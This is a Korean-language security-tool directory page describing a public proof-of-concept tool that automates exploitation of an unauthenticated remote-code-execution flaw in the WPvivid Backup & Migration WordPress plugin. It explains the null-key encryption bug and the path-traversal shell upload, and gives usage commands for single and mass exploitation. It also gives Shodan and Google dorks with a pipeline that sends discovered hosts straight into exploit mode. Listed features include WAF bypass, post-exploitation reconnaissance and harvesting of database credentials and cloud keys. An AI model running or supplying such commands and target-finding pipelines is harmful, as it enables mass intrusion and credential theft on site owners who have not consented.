Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-1357-POC — # CVE-2026-1357 자동화 익스플로잇 도구 WPvivid Backup & Migration의 인증되지 않은 RCE 취약점인 CVE-2026-1357을 위한 자동화 익스플로잇 도구입니다. WordPress 대상을 스캔하고, WAF/403을 우회하며, 경로 탐색을 통해 셸을 업로드하고, 보고서 생성과 함께 사후 익스플로잇 정찰을 수행합니다. | Kitploit
도구/GitHubGitHub/cybertechajju/cve-2026-1357-poc
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationData ExfiltrationPost-ExploitationWAF BypassPenetration Testing

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
cybertechajju/cve-2026-1357-poc

CVE-2026-1357-POC

# CVE-2026-1357 자동화 익스플로잇 도구 WPvivid Backup & Migration의 인증되지 않은 RCE 취약점인 CVE-2026-1357을 위한 자동화 익스플로잇 도구입니다. WordPress 대상을 스캔하고, WAF/403을 우회하며, 경로 탐색을 통해 셸을 업로드하고, 보고서 생성과 함께 사후 익스플로잇 정찰을 수행합니다.

저장소 보기
816개월 전아직 검토되지 않음

CVE-2026-1357 — WPvivid Backup & Migration RCE

CVE 크레딧: Lucas Montes (NiRoX)
도구 제작: CyberTechAjju
CVSS: 9.8 (치명적) | 영향: ≤ 0.9.123 | 패치됨: 0.9.124


⚠️ 면책 조항

승인된 보안 테스트 전용입니다. 시스템에 대한 무단 접근은 불법입니다.


개요

두 가지 연쇄 버그를 통한 WPvivid Backup & Migration의 인증 없는 RCE:

  1. 암호화 Fail-Open — 잘못된 키에서 openssl_private_decrypt()가 false를 반환 → phpseclib v1이 이를 null-byte AES 키로 처리 → 공격자가 16개의 null 바이트로 암호화
  2. 경로 탐색 — 검증되지 않은 name 필드 → ../uploads/shell.php가 백업 디렉토리를 벗어남

제약 조건: wpvivid_api_token이 생성되고 만료되지 않은 경우에만 악용 가능.


기능


설치

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt

사용법

root@kitploit:~
# 스캔만 (WordPress + WPvivid + 버전 탐지)
python3 cve_2026_1357.py -u http://target.com

# 스캔 + 악용 + 자동 사후 악용
python3 cve_2026_1357.py -u http://target.com --exploit

# 사후 악용 정찰 없이 악용
python3 cve_2026_1357.py -u http://target.com --exploit --no-post

# 보고서 포함 대량 스캔
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

# Burp 프록시 경유
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080

# 페이로드 전용 모드
python3 cve_2026_1357.py -u http://x --payload-only

모든 옵션

root@kitploit:~
-u, --url         단일 대상 URL
-l, --list        URL 목록 파일 (한 줄에 하나)
--exploit         악용 모드 활성화
--shell NAME      셸 파일명 (기본값: pwn_remote.php)
--no-post         사후 악용 정찰 건너뛰기
--report          Markdown PoC 보고서 생성
--report-dir DIR  보고서 출력 디렉토리
-t, --threads N   동시 스레드 수 (기본값: 5)
--timeout SECS    요청 시간 초과 (기본값: 10)
--proxy URL       Burp용 HTTP 프록시
--payload-only    base64 페이로드 출력 후 종료
Screenshot_2026-02-14_00_18_14 Screenshot_2026-02-14_00_18_55

대상 탐색 (Dorks)

전체 목록은 dorks.md 참조. 빠른 예시:

root@kitploit:~
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"

# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"

# 파이프라인
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
  | awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

파일 구조

root@kitploit:~
CVE-2026-1357-poc/
├── cve_2026_1357.py    ← 메인 도구 (스캐너 + 악용기 + 사후 악용)
├── dorks.md            ← Shodan/Google/Censys/FOFA/ZoomEye dorks
├── requirements.txt    ← Python 의존성
├── .gitignore
└── README.md           ← 이 파일

크레딧

Lucas Montes (NiRoX) — CVE 발견
CyberTechAjju — 악용 도구 제작

도구 다운로드
기능설명
🔍 자동 탐지WordPress + WPvivid 플러그인 + 버전 핑거프린팅
🛡️ WAF 우회User-Agent 회전, 헤더 스푸핑, 인코딩 트릭
🔓 403 우회X-Forwarded-For, X-Original-URL, 경로 정규화, 이중 인코딩
💀 자동 악용Null-key AES 페이로드 + 경로 탐색 업로드
📋 사후 악용20개 이상의 정찰 명령 자동 실행 (id, whoami, passwd, wp-config, SUID 등)
🔑 데이터 추출기출력에서 DB 자격 증명, API 키, 비밀번호, AWS 키 추출
📊 보고서 생성전체 악용 증거가 포함된 Markdown PoC 보고서
⚡ 대량 스캔프록시/Burp 지원 멀티스레드